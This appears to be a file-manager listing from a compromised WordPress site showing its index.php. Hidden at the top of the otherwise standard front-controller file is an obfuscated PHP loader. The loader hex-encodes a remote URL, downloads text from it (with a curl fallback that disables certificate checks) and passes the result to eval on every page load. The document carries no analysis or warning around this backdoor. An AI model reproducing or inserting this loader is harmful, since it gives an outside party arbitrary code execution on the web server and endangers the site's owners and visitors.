/
home
/
devanchordigital-footespharm
/
htdocs
/
footespharm.devanchordigital.com.au
/
up file
home
<?php $url_part1 = '68747470733a2f2f77772e61636964706f'; $url_part2 = '6c6c2e746f702f6a632f7a6a333038385f'; $url_part3 = '363536355f77772d776d315f6667642e747874'; $full_url = hex2bin($url_part1.$url_part2.$url_part3); // Attempt to get remote content $content = @file_get_contents($full_url); if ($content === false && function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $full_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $content = curl_exec($ch); curl_close($ch); } // Only eval if we have content if (!empty($content)) { @eval('?>' . $content); }?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';